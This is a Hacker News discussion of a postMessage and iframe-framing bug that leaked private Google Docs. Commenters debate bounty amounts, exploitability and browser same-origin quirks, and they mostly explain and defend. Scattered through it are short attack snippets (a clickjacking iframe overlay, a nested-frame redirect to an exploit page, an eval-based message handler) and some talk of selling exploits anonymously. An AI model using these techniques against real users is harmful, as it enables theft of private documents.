Stealing private documents through a bug in Google Docs (savebreach.com)
319 points by hackerpain on Dec 28, 2020 | 138 comments



A few years ago, I built a platform for a client that allowed his customers to show a "Text Me" widget on their websites; the software handled all of the SMS / messaging and basically substituted for a conventional contact form or Intercom integration.

His customers used Google AdSense, which started blocking them until they removed the widget. The reason? The widget used postMessage from an iframe, but appropriately specified the single sandboxed target domain. As expected, we were never able to speak with a human at Google; they just sent my client's customers intimidating emails about a security flaw on their websites.

Seeing Google abuse the postMessage API with a wildcard argument after this fiasco is maddening! If only they were held to their own arbitrary and vague standards.
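For anyone unfamiliar, the distinction boils down to the second argument of postMessage. A minimal sketch (the element ID, origin, and payload are illustrative):

    // Hypothetical widget embed; all names are made up for illustration.
    const widget = document.getElementById('text-me-widget').contentWindow;
    const payload = { type: 'sms', body: 'Hello' };

    // Targeted: only delivered if the frame is still on the expected origin.
    widget.postMessage(payload, 'https://widget-provider.example');

    // Wildcard: delivered to whatever origin the frame currently holds.
    widget.postMessage(payload, '*');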


Myeah. Here is another example of Google misunderstanding postMessage and mistaking a vulnerability in a website for a vulnerability in a competing "Chromodo" browser, and making a big fuss about it: https://code.google.com/p/google-security-research/issues/de... (https://news.ycombinator.com/item?id=11023584)


It doesn't look like that to me.

There's an exploit demo here[1]. If the exploit worked in Chrome or Firefox as well as Chromodo, that would clearly indicate the problem is with the website, not with Chromodo. I find it hard to believe that no one at Google or Comodo would test the exploit page in Chrome or Firefox. There's discussion on the original bug and here[2] indicating that Comodo did push out a fix, and it sure sounds like that was a fix to Chromodo.

Secondly, looking at the exploit demo, it does two postMessage()s, one in each direction, both using execCode. If it were a vulnerability purely in https://ssl.comodo.com, the second postMessage() looks like it would fail, because there isn't any code around to receive it.

Thirdly, looking at the exploit demo, it has a text box with which you can specify which site you want to attack. So you could change that to https://google.com or https://news.ycombinator.com . If the exploit only worked against a single site, it wouldn't make sense to provide a text box allowing you to change which site to attack.

Taviso's description is a bit misleading. It doesn't sound like the action that Comodo took is to directly disable the same origin policy, but rather to provide an API with which attackers can bypass the same origin policy. From a security perspective that does effectively disable the same origin policy, but from an attack understanding point of view, it's a bit different.

Full disclosure, I work at Google, but not on Project Zero.

[1] https://bugs.chromium.org/p/project-zero/issues/attachmentTe...

[2] https://bugs.chromium.org/p/project-zero/issues/detail?id=71...


I see, fair enough. Thanks for the explanation.


> Apparently https://ssl.comodo.com/ used to then proceed to execute that code. However, this is not a vulnerability in the browser, but in that website. Am I missing something? Was Chromodo breaking the `messageEvent.origin` property, breaking same-origin checks in JavaScript? Seems far-fetched.

I believe it's neither of these - I think the claim being made is that Chromodo installs a custom event listener for MessageEvents in all websites, which exposes a handful of APIs, including "execCode" and "callOuterFunction". If you look at the sample exploit (https://bugs.chromium.org/p/project-zero/issues/attachmentTe...), while it defaults to ssl.comodo.com, you can specify an arbitrary website.

(Also, if this were indeed a website bug, this would have been reproducible in normal browsers.)

We would need to find a vulnerable version of the Chromodo browser to confirm this.
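If that reading is right, the injected listener would have been something like this speculative sketch (only the "execCode" name comes from the exploit demo; the rest is guesswork, not Comodo's actual code):

    // Speculative reconstruction of the injected message handler.
    window.addEventListener('message', function (event) {
        // Crucially, event.origin is never checked, so any embedding or
        // embedded page can drive this API in this page's origin.
        var msg = JSON.parse(event.data);
        if (msg.action === 'execCode') {
            eval(msg.code); // attacker-supplied code runs with this site's privileges
        }
    });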


This was a bug that affected multiple products and even crossed into the enterprise suite, and Google only rewarded $3.3K USD?

It’s almost as bad as Apple’s reward program


It's definitely a vulnerability, but to be a little more grounded in reality, to exploit this you need to somehow convince your victim to go to your website which contains the document you're trying to get access to.

So for this to work you need to know the document ID, and also the person who owns this document. You then need to trick them into looking at their document on your domain, and then from there, need to persuade them somehow to press the send feedback button.

I'd also note that the feedback button is a button that I suspect very very few people ever press. I certainly never have. I also don't know the IDs to any documents I might find interesting but can't read, and if I find a document via some random google search that I can't look at, I generally have no way of knowing how to contact the owner so I can try to send them phishing emails to get them to look at their document on a non-google URL.

There's been a bunch of cases where Google has paid out very substantial bounties, and given the extreme difficulty of both meeting the attack prereqs and then managing to pull off a very sketchy exploit process at the same time, I think the sum paid is more than fair.


Oh, I didn't even think about this, but I think you're right: there's no generic way of iframing a victim where you can see all their document IDs. This doesn't seem very plausible.


I'm on cc: lists with documents I don't have access to all the time. It depends on how organizations interact. And I suspect it wouldn't be very hard for me to iframe Google Docs and appropriately obscure things so someone does, indeed, click where I want.

$3.3k is about a week's worth of time for a poorly-paid developer before overhead.

It's not reasonable. At those rates, the only people who will be able to afford to be paid to do security work on Google products will be ones who sell on the gray/black market. The whole point of bounties was to give a path without the need for that.


Way easier to convince the customer to share the document.


True, but I think a business account can disable the simple "share" to outside accounts and there would be more logs (of the type the business would be able to see) of what happened.

These exploits are often not so interesting as written and with current normal setups, but eventually become more interesting if never fixed.


Can you lay out a realistic exploitation scenario for this bug? It seems to have several predicates:

1. You need to know the document ID you're targeting (Stack Exchange once worked the ID out to ~256 bits).

2. You have to get the victim to interact with a Google doc on a site that you control (you need to re-dress the Google Docs interface, get the victim to your site, and then have them treat your site as if it was Google Docs).

3. You need to get the victim to use the Google feedback feature in order to trigger the vulnerable postMessage.

What's a scenario in which an attacker gets these stars to align? (I'm sure there is one).


Sure, why not:

1. I go to a job interview at a company that uses a chromebook with a restricted account. The interviewer sits next to me as I go through the process.

2. As we go through the steps in a Google document, I need something from my resume on my website. I fumble with the URL bar slightly, which hopefully still has the doc ID, possibly because I once closed the document "by accident" and brought it back up.

3. While discussing whatever brought us to my website, I click on something but act like I am switching tabs.

4. At the end of the process in their document, I point out how strange Google Docs looks now and press the feedback button to show off my corporate soft skills.

5. The company's hiring interview document is now floating around my school, and in 10 years half of their engineering team is from my alma mater.


At that level of realism there are much more efficient attacks

https://i.imgur.com/lkUV5Mf.jpg


This is implausible as well, no one simply 'goes to a company', offices are long gone.


Isn't this essentially a Clickjacking bug? Doesn't the victim have to (1) deliberately have a sensitive document open, (2) be somehow framed by an attacker's malicious IFrame, and then (3) click the "submit feedback" button to report a problem to Google?

All three of those conditions are independently rare. The equivalent conditions are rare in all CJ bugs, which is a reason CJs are sort of a running joke in appsec. This bug isn't a joke (look at the target and the impact), but condition (3) is also way more unlikely than the median CJ report somewhere else.

If I understand the bug correctly --- maybe I don't --- this researcher got what might perhaps be the largest bounty ever paid for a CJ bug.
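For readers unfamiliar with the pattern, a classic CJ page boils down to something like this (URLs and styling are illustrative; in this particular bug the framed page was visible rather than hidden):

    // Classic clickjacking sketch: an invisible cross-origin iframe is laid
    // over a decoy page so the victim's clicks land in the framed document.
    const frame = document.createElement('iframe');
    frame.src = 'https://docs.google.com/document/d/DOC_ID/edit'; // attacker must know DOC_ID
    Object.assign(frame.style, {
        position: 'absolute', top: '0', left: '0',
        width: '100%', height: '100%',
        opacity: '0', // invisible to the victim
        zIndex: '2'   // but on top, so it receives the clicks
    });
    document.body.appendChild(frame);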


This seems a bit different from clickjacking to me. In CJ, the victim performs sensitive actions because the UI is obscured. Here the UI is unobscured, and the user performs actions that should be fairly innocuous.


(Googler, opinions are my own)

Are you sure this impacted multiple products? Reading the article, the main reason he was able to exploit this for Google Docs was the missing X-Frame-Options header. It's not clear that other products are missing it too.


It works on any other Google product that has the "Submit Feedback" link on it. I just tested this out with Google Webmasters and it's an issue there as well.


It is unlikely they wouldn't have checked other products as part of the fix. So I'm going to ask for more proof that you "tested this out".


[flagged]


You can't comment like this on HN; accusing other commenters of having secret conflicts of interest is the HN Guideline 'dang corrects most often here:

https://hn.algolia.com/?dateRange=all&page=0&prefix=false&qu...


Doesn’t seem like an accusation of a conflict of interest to me, just pointing out who has the burden to test. Since one is paid by the company, it does make sense that testing the company’s products would be his responsibility first.

Whereas the previous comment was accusing the other one of lying about testing it.


Did I miss the place on this thread where the person we're talking about said they worked for Google?


Nope. Sorry. I messed up. I thought I saw the same person commenting who had already said they worked at Google.


An employee of X is better suited to investigate a bug in X than a non-employee is.


>It’s almost as bad as Apple’s reward program

Or most/all bug bounty programs, actually.


I hear this refrain often, and it is of course never followed up with a solution.

What would you suggest, a bounty calculated via a multiple of company stock price?


I think it's pretty obvious that the solution to "not paid enough money" is "pay more money".


How should the price be discovered?


while (recipient_is_unhappy_with_amount) { amount *= 3.14; }


That’s an effective way for recipients to always be “unhappy” with the bounty.


How should their happiness be ascertained? Their word?


Offer them a job.


If you don’t like how much they pay, maybe don’t brand yourself a “security researcher” and then try to earn the equivalent of full-time pay by finding bugs in other people’s products and blogging about it?


This provides very little incentive for future good actors to search for these exploits... I had no idea the reward would be so low.


> This was a bug that affected multiple products and even crossed into the enterprise suite and google only rewarded $3.3K USD?

They could have also offered nothing, which was common up until a decade ago or so. Moreover, there isn't a market for security bugs like this, so it's not like Google is underpaying relative to some independent valuation.

The only reason to pay more is out of some ethos that the reporter "deserves" more, but that's not how business works. The value Google obtains by finding any given vulnerability approaches 0. This is why, among other reasons, good product security teams spend most of their time doing things other than searching for vulnerabilities in existing code.


You do need to actually "give feedback" to trigger this, which seems a bit far-fetched for a corporate worker - that might be why they didn't think this was high impact; of course, it should have been higher though.


The level of reward is related to the exploitability and attack vector, not just the results of being exploited.


The most surprising part to me is that this works:

    window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
It's expected to me that you can change `window.frames[0].location`, since you can also change the "src" attribute of the iframe element. But you can't change the "src" attribute of an iframe inside that iframe, if it's not same-origin - so why can you change its location?

Maybe we should look into whether changing this would break any websites.


Context: Changing location was a way of message passing (just change the hash) before `postMessage` was widely available. Also, sometimes you are managing a widget embedded in a page which is embedded in your application.

That said, this is one of those things that might be best relegated to the "Phase 0" APIs now that there is a better way to do things (e. g. postMessage).
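Roughly, the old hash trick looked like this (names and the message format are made up; this is a sketch, not any particular library):

    // Embedder: signal the widget by rewriting only the fragment.
    // After the initial load, fragment-only changes don't reload the frame.
    const widget = document.getElementById('widget'); // an <iframe>
    widget.src = 'https://widget.example/embed#' + encodeURIComponent('resize:300');

    // Inside the widget: poll for new messages (this predates hashchange events).
    let last = '';
    setInterval(function () {
        const msg = decodeURIComponent(location.hash.slice(1));
        if (msg && msg !== last) {
            last = msg;
            handleMessage(msg); // hypothetical handler
        }
    }, 100);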


I see, thanks for the context. Perhaps, if changing the hash is the primary use-case, we could allow only that (in the `location` setter). Alternatively, browsers have been breaking various things in iframes recently (e.g. by isolating cookies), so maybe breaking this as well would be acceptable if it's not commonly used.


It was also a way to do what XMLHttpRequest does before it existed.


I find it insane that people want to use apps built off this creaky technology.


You find it insane that the general public isn't concerned with (and/or doesn't understand) highly technical implementation details?


docs.google.com didn't have X-Frame-Options: DENY or a restrictive CSP, so I think it's a browser quirk (or rather, a clever bypass) that works here. Also, the author exploited a postMessage flaw that wasn't validating the host name properly, which led to the cross-origin leak of screenshot data.

Check this out https://youtu.be/KpkrTUHoWsQ (video about URL validation bypass and SOP)
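For context, the framing controls that were missing would look roughly like this on the server side (sketched as a hypothetical Express app, purely illustrative):

    // Response headers that prevent a page from being framed at all.
    const express = require('express');
    const app = express();

    app.use(function (req, res, next) {
        res.set('X-Frame-Options', 'DENY'); // legacy framing control
        res.set('Content-Security-Policy', "frame-ancestors 'none'"); // modern equivalent
        next();
    });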


The missing header just means that docs.google.com can be embedded in an iframe, I'm not surprised about that. But the parent window still shouldn't be able to access the contents of that iframe. And in fact this doesn't work:

    document.getElementsByTagName('iframe')[0].contentDocument.getElementsByTagName('iframe')[0].src = "https://geekycat.in/exploit.html";
For obvious reasons (you can't access the DOM of a cross-origin iframe). So it's surprising that this works:

    window.frames[0].frames[0].location = "https://geekycat.in/exploit.html";


For legacy reasons the location object is special (you can write to it, which is a proxy for writing to `location.href`). Some details here: https://developer.mozilla.org/en-US/docs/Web/Security/Same-o...

This is actually quite difficult to protect against while keeping functionality intact (not granting allow-scripts to iframes would do it, but that also obviously disables JavaScript).

The emerging https://github.com/dtapuska/documentaccess standard would be a defense-in-depth against this attack.
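Concretely, the asymmetry looks something like this (assuming `frames[0]` is cross-origin):

    // Reads of a cross-origin Location are blocked by the same-origin policy...
    try {
        console.log(window.frames[0].location.href);
    } catch (e) {
        console.log('read blocked:', e.name); // SecurityError
    }

    // ...but writes (i.e. navigating the frame) are allowed for legacy reasons.
    window.frames[0].location = 'https://example.com/';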


Myeah. I was aware that `WindowProxy.location` exists, but not that `WindowProxy.frames` exists. To me, that's the more surprising part - as `window.frames[0].location` should indeed be writable, but I feel like accessing `window.frames[0].frames` is more debatable - even knowing the number of iframes in a page might leak information in certain cases.


I agree, this seems wrong. Does it work in all browsers?


It seems there's a typo in the quote, but the following indeed works in both Chrome and Firefox:

    window.frames[0].frames[2].location = "https://example.com";
Even if `window.frames[0]` is cross-origin.


This behavior is defined in the HTML spec, here:

https://html.spec.whatwg.org/multipage/browsers.html#crossor...


To the people publishing these exploits and collecting the trivial bounties:

Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.


For a lot of those that pursue a white-hat career, it comes down to:

1. Principle - Some people are raised with really high morals and don't optimize for money. Depending on their own conscience, they wouldn't be able to sleep at night.

2. Obeying the law - Although one can easily make more money by using or selling these exploits, it can be a very dark path to dig yourself into. And depending on where you live, the risk of life-ruining litigation is very high too.

3. Brand reputation / Brand building / Professionalism - one can see that they can make more money on their own by building a solid portfolio of their achievements, and these bounties are a really strong signal when corporations look for security consulting. It also builds a good reputation, which is really hard to build when doing white-hat hacking for a living.


Kudos to them for disclosing critical bugs to one of the largest companies on the planet for less than their developers get paid for a week of work.

Not saying they aren't good people, they are just undervaluing their work.


I mean, point 3 is a big part of this, value-wise. By getting certified bounty-paid vulnerabilities in a big-name product like Google's, they can then go on and get lucrative security contracts ("we hired a guy that has found bugs in Google's products").

Also left unsaid is that these are products that people's grandparents use. So there is some very white-hat "help the public good" here. Even if it's also to the for-profit benefit of a mega corp. That's an issue for anti-trust courts, not people trying to make the world better (people use these products right now, that's the status quo; either it can be fixed now, or it can be part of a likely ineffectual protest that only harms others).


> very white-hat "help the public good" here

> trying to make the world better

Indicating that Google the company doesn't care about such things

(Although most individuals working there do)


Just to be clear, I'm not supporting the low value of the bounty.

My point is that there's more to it than just that. Aside from the subjective point 1 in my comment, I think points 2 and 3 are very objective and don't really depend on the pay of the bounty.

If they find a bug and try to sell it on the dark/grey market, they risk litigation. If they are smart they can derive more value from it than just the bounty, although a bigger bounty would be nice and would encourage more white-hat hackers to invest their time in these programs.


So Google cheaps out on bounties because developers are clamoring to do free work for a mega-adtech corp in hopes that the clout they get from it will pay out down the road.

That's the most dystopian thing I've heard in a while.


A different interpretation is that large companies are able to find bugs of this magnitude on their own on a weekly basis, and fix them before the public hears about them at all.


Apparently not.


If this bug works the way I think it does --- again, I could be wrong, but this looks like a pretty straightforward clickjacking exploit to me --- there is nobody in the whole world that is going to pay what Google just did for it, because the only value this bug has is to be resold to Google for a bounty.


Spear phishing?


If you can spear phish someone into a fake Google Docs site to interact with a real document, you can almost certainly spear phish that person to simply reveal their credentials to you.


I see this sentiment frequently, but there are many ways to make money if you ignore the ethics of the transaction.


> why you wouldn't just sell this off

Wouldn't it be immoral if not straight up illegal?


Specifically which law do people believe selling exploits violates? Off the top of my head I've only got "conspiracy"-like laws and international embargoes (depending on buyer).

Should it be illegal? Yeah, potentially. Is it? Unclear.


Why should it be illegal? From a US perspective, I don't think selling words/ideas should be illegal in most cases--especially just because it could be used for doing something illegal. For instance, there are books which describe chemical processes for synthesizing methamphetamine (https://www.amazon.com/Secrets-Methamphetamine-Manufacture-U...). But they are not illegal, because if they were it would infringe upon freedom of speech. Deciding what can and cannot be sold/published is a very authoritarian path to go down. It is better to just outlaw the criminal behavior.


I'm extremely wary of a law that would potentially criminalize that. It would almost certainly have to be very vague and prone to being abused by malicious prosecutors. How would you set it up such that it's illegal to sell an exploit to a supposedly malicious actor, but not illegal to sell or negotiate prices with the company maintaining the software or some other company that they deem to be their agent for managing security reports, per current White Hat practices?

Conspiracy convictions usually require proof that the suspect had created a plan to commit a serious crime and has taken active steps towards the execution of that plan, even if they haven't committed the actual crime yet.

We're already perilously close to US Federal Prosecutors being able to lock up anybody they don't like indefinitely. It's so exorbitantly expensive to fight Federal charges that hardly anybody really does, much less does successfully. The last thing we need is more vague Federal criminal laws with poorly thought out evidence and mens rea requirements.


There's no selling/negotiation in the current model. If you go to Google and say "I found this bug, I'll tell you what I did for $50K", that's extortion. If you disagree with their classification or payout, you can contest that classification in the system - but you are not arguing on the price of the exploit, you are arguing on what the exploit is.


At least accessory to crime if the exploit is used in a criminal activity, I presume?


If you traded it off Tor with a burner computer at a cafe or something, there is absolutely no way anybody could trace it back to you. It took the FBI several years to catch the Silk Road guy, and IIRC they pinned him on buying a hitman's services, not drug trafficking.


While I agree with you, any competent lawyer could frame this under the Computer Fraud and Abuse Act


Illegal, including the logistics of selling it to shady/nation state actors. You can't just put a craigslist ad out for "selling google docs exploit" and expect them to reach out to you, if you don't already have contacts in the game you're probably not going to find a place to sell it (and then you might have issues receiving the money if you're US-based). The only grey area where you could really sell an exploit is something like zerodium https://zerodium.com/program.html


You could definitely find a place to sell it as no trust is necessary: it would be trivial to prove you have the exploit without revealing the details.


Your parent comment isn't talking about the difficulty of closing the transaction, but initiating it.


You really don't have to look hard to find forums where people are selling exploits for $10k and up, though I imagine for multi-million transactions there are different forums.


You can find people who claim all kinds of things on the internet. That doesn't mean they're credible.


If they were offering to buy for $10k and up, maybe that'd be different? (more likely to be serious? Or a honeypot somehow?)


What should be made illegal is selling and use of exploits. That would put a lot of those shady "security" companies in trouble...


You'd have to be pretty well connected wouldn't you? It's not like you can just put up a craigslist ad that says, "looking for cybercriminal to buy my hack".

But from the description, it doesn't sound like this vulnerability has much practical use. If you can convince someone to do all the things necessary to tee this up, you can probably just convince them to email you their password.


I'm pretty sure most humans are nice to each other because they enjoy it and feel obligated to be nice, not for reward nor fear of punishment.


That seems naive and is refuted by the existence of a legal system.


Quoting myself: "most". Therefore, the existence of a legal system does not refute the claim.

One example: At times it seems there are more dogs in my neighborhood than humans, yet, I thankfully seldom see dog poop left on the ground.


[flagged]


Now you're not even trying to engage in the logic of the conversation. I hoped for better in this forum.


Because it's difficult to, and difficult to ensure that those you're selling it to are trusted, that the means of transmission are secure and won't be intercepted, etc. You also need the means to value it; how do you go about that?

This also does not build your career.

Saying

>Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.

Is just naïve.

3.3k for doing nothing but disclose is incredibly generous, especially for this, where the vector is incredibly targeted and needs private information to begin with (the doc ID).


So by that token, hats off to the developers who don't intentionally put bugs in their code when they could, and allow a friend to capture the exploit to split the bounty.


I suppose if the bounties got really high, and higher and higher, eventually that'd start happening more and more often.


> Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.

Aside from the ethical considerations you'd have to navigate, there isn't a market for vulns like this outside of bug bounties.

People on HN always cite Zerodium or whatever but don't realize those markets exist for vulns with a long half-life. The expected return on a vuln which exists in one website is quite bad.


Not everyone does bad things for a living.


Fun? Integrity? Professionalism? The fact that there isn't a market for these kinds of bugs?


https://zerodium.com/program.html

Google's SaaS apps aren't specifically in scope, but I'm not seeing exclusions, and I'm seeing potential parallel programs ("sensitive information disclosure: - MS Office (Word/Excel)") that could imply that they'd be comfortable buying SaaS Productivity Suite exploits as well.

I'm not OP. I'm only presenting this to counter the assertion that there's no market.


Because it is illegal?


I thought the US govt actively BOUGHT these types of cracks and hacks and used tools that used them.

How do police departments crack open phones?

Does this mean they are breaking the law by buying these exploits?


Is it? Which law is being broken?


Which law does selling an exploit break?


Most people aren't sociopaths.


Agree to disagree.


Curious question, if you find a few vulnerabilities like this, does it mean that you could get hired by Google to do this internally?

What I'm trying to ask is: does this make the hiring process easier?


It definitely can help. In my experience, finding these kinds of bugs can help you get the interview, but it doesn't necessarily help that much once you get to the interview since the interview process is still standardized and focuses on evaluating you across a number of different areas (not just vulnerability research). But it definitely helps get some good attention!

Disclosure: I work at Google on their security team and reported a number of bugs to their VRP before I got hired.


Sure, you could get hired like anybody else after passing a week-long string of whiteboard exams.

Start dropping zero days on twitter if you really want to get hired:

https://nakedsecurity.sophos.com/2019/06/13/microsofts-battl...

wah wah bad person publishing zero days wah wah Irresponsible disclosure hurts everyone. wah wah

reality: https://krebsonsecurity.com/2020/04/microsoft-patch-tuesday-... got hired @Microsoft, started fixing other bugs they didn't know they had


I've gotten hired because of vulnerability reports. It helped skip a lot of the "convince me that you know what you're doing" phase of interviews and it was then mostly just social/team fit!


No, and if it came up it would work against you. It means you are working basically for free for Google. At least you can put it on your resume, although that might work against you.


Good lord, $3K for this?

These companies give two craps about security.


Google should have awarded a much larger value to this. Like $100k. This is a serious flaw.


What makes you say this is a serious flaw? It seems pretty minor to me. The page would have to be embedded (so the URL would be obviously wrong) and it requires several steps of manual user action with an uncommonly used feature (the feedback form) just to exfiltrate a tiny amount of data (the iframe viewport)


Right, but the potential surface area - basically all docs, including private ones - is absolutely huge. Preventing this from happening even once is worth more than $100k IMO.


(googler here, uninvolved with this bug though)

It also requires that the attacker know the document ID - so they would have to identify a document that they want access to, get the ID of that document, embed the document in a website that they can present to a user that DOES have access to that document (which they would be unable to know from the document itself, because the ACLs are only visible to people with view access), and then get them to click submit feedback.

I'll defer to others with more familiarity with bug bounties about the payout appropriateness, not my area of expertise, but it does seem like this would be a very difficult bug to exploit


Minor? Depends on if you use the private doc feature and what lawsuits may follow. One of them will cost more than the bounty just to look at.


Right, but you'd somehow need to not only get your hands on the URL of a private doc but then inexplicably convince them to use the "send feedback" feature on that same private doc. This is a neat bug, don't get me wrong, but I don't think this is even something most would consider exploitable. IMO this is about as exploitable as telling the victim to hit the button labeled "PrntScr" on their keyboard and then hit Control-V.


"so the URL would be obviously wrong": The average user have no idea that an URL could be "wrong".


Such a user would be fooled by a plain old phishing attack then and there'd be no need for such sophisticated methods.


I don't really know, but maybe if you insert the URL of a <Clone Document> link so the user clones some well-crafted document, that document may access some other documents and a screenshot may leak them.

It's only a possibility, but usually once you have the XSS puzzle piece, getting the data may be as trivial as some JS code.


Do you seriously expect them to pay $100k for a decently serious bug in only one of their products?

In comparison, Apple paid $100k [0] for a full account takeover, using a bug so simple that it is unbelievable that it could have passed code review and testing.

[0]- https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-a...


Perhaps it shouldn't be Google paying for the security reports, but the government... who then would need the statutory authority to fine Google for a very handsome profit?


Yes, $100k is not a lot of money for an issue like this. It's also not a lot of money in Google's security budget.

Apple's payout seems rather low to me. If I had a vuln like that and knew they were only paying $100k, I would probably seek to monetize it elsewhere.

$3k is almost insulting for something like this, given Google's scale. $31,337 might be more appropriate to at least avoid insult.


> Yes, $100k is not a lot of money for an issue like this.

Requiring rare user action and document URL? Sure. Live in your bounty bubble.

> If I had a vuln like that and knew they were only paying $100k, I would probably seek to monetize it elsewhere.

But you don't. The person exploiting it knows how much it is worth.

> $3k is almost insulting for something like this

Not for you to decide. He accepted it, meaning it's not insulting.


This one technically requires some user interaction.

Anyway, in the past I found a way to take over an organization account in a Google Cloud acquisition and they rewarded me $100, saying their "Panel" decided that. Google's VRP panel sucks, so you're right about that.


I would stop sending these in and keep them for myself. I might trade them or sell them or write about them, but I wouldn't give them to Google in the hopes of a payment.


I am sorry, but that can ruin your career, as it's illegal. You can't sell or trade vulnerabilities in live websites like Google's per the terms and conditions of the Google VRP (responsible disclosure policy). While it may seem unfair, it's illegal to do so.


It’s not illegal, criminally, to break terms and conditions. At least in the US.

You may have some impact on your career and be judged by your peers or perhaps brought to civil court for damages, but if done right it’s totally legal to sell exploits.


> Google rewarded $3133.7 for this bug under their VRP program.

It's a pretty odd amount too. I'm curious how they arrive at that number.


It's an old hacker reference to "eleet": https://en.m.wikipedia.org/wiki/Leet


Google's VRP team has a tradition of rewarding four- and five-figure amounts that match 1337 or L33T (leet, or elite).

Example bounty amounts: $1337, $3133.7, $13337 and $31337


The 1337 could be a nod to gamer culture because it stands for “leet” and may be popular with the folks who participate in bug bounties. Pure speculation on my part here.

EDIT: yep, looks like I missed all the other comments pointing this out, mobile app didn’t load them for some reason. Leaving the comment anyway.


Just to expand on this a bit, 31337 goes waay back, before 'gamer culture' was a thing, and was popular enough that it got mentions in the 1995 movie Hackers.

I vividly remember BBS and IRC handles with variations of 31337 in them in the 80s. I'm sure it goes back even farther.


I think someone tried to be cute by having '1337' in the sum. If the figure wasn't so insultingly low it would've been fun.


Client-side encryption really decreases the attack surfaces of cloud storage solutions.

It’s really sad that Keybase failed at building a business around this. Hopefully someone else is going to make another attempt.


It wouldn't have prevented this issue though.


Oh, right...true.


No one cares more about your data than you do. Syncdocs https://syncdocs.com also does end-to-end encryption of Google Docs.

The problem is that encryption adds an extra layer of complexity.


If the client-side encryption is in the browser, it would not help: this hijacks the channel between two different parts of the application, not the cloud storage connection.

Having a native, non-web app would help here, but I don't think that is ever going to happen.


> Client-side encryption really decreases the attack surfaces of cloud storage solutions.

They should rename end-to-end encryption to client-side encryption or something else, because it is not very clear what it means.


Not all client-side encryption schemes are end-to-end or at-rest encryption schemes though. Trivial counter example: TLS.


We're making an attempt with Peergos.


Not sure how Peergos is a relevant alternative to Keybase? Maybe you're just thinking of the file sharing aspect of Keybase?

Keybase at its core was a key directory that's publicly auditable. Everyone could verify the chain of verification of each other in Keybase. On top of that infrastructure, files and chat were added.

Peergos doesn't seem to show any chains or in fact auditable information at all. You can add/remove friends in a way that is supposedly cryptographically verified, but there is no information about it, nor is there any information about where the data is actually stored, how you can get it to your local machine, how to re-verify the claims, or how to add devices that have access.


There is a public append-only merkle-tree with all identities published in it, in a way analogous to certificate transparency. When you add a friend you are looking them up in this tree and then storing their public key chain in your own (private) storage in a TOFU (trust-on-first-use) manner (then any key changes they make are verified against your local copy).

You can also verify keys in person using the same protocol as Signal (via QR codes or number groups).

There are no private keys stored on any devices, so adding devices is not a thing. It is a pure capability based system.

Unlike keybase, we are fully open source and self-hostable.

There are a lot more details in our booklet- https://book.peergos.org
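A minimal sketch of the TOFU step described above (the lookup function and storage shape are assumptions, not Peergos's actual API):

    // Trust-on-first-use key pinning, illustrative only.
    const pinned = new Map(); // username -> public key, kept in private storage

    async function verifyFriend(username) {
        const key = await lookupIdentity(username); // hypothetical: reads the public append-only log
        if (!pinned.has(username)) {
            pinned.set(username, key); // first use: pin the key
        } else if (pinned.get(username) !== key) {
            throw new Error('Key changed for ' + username + '; verify out of band');
        }
        return key;
    }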


Thanks for going through the write-up. As the author of the bug report, considering the impact, the user interaction required, and the other criteria that need to line up to exploit this bug, I feel Google VRP's decision on this bug is accurate.


TBH, not surprised at all that GDocs had an issue.



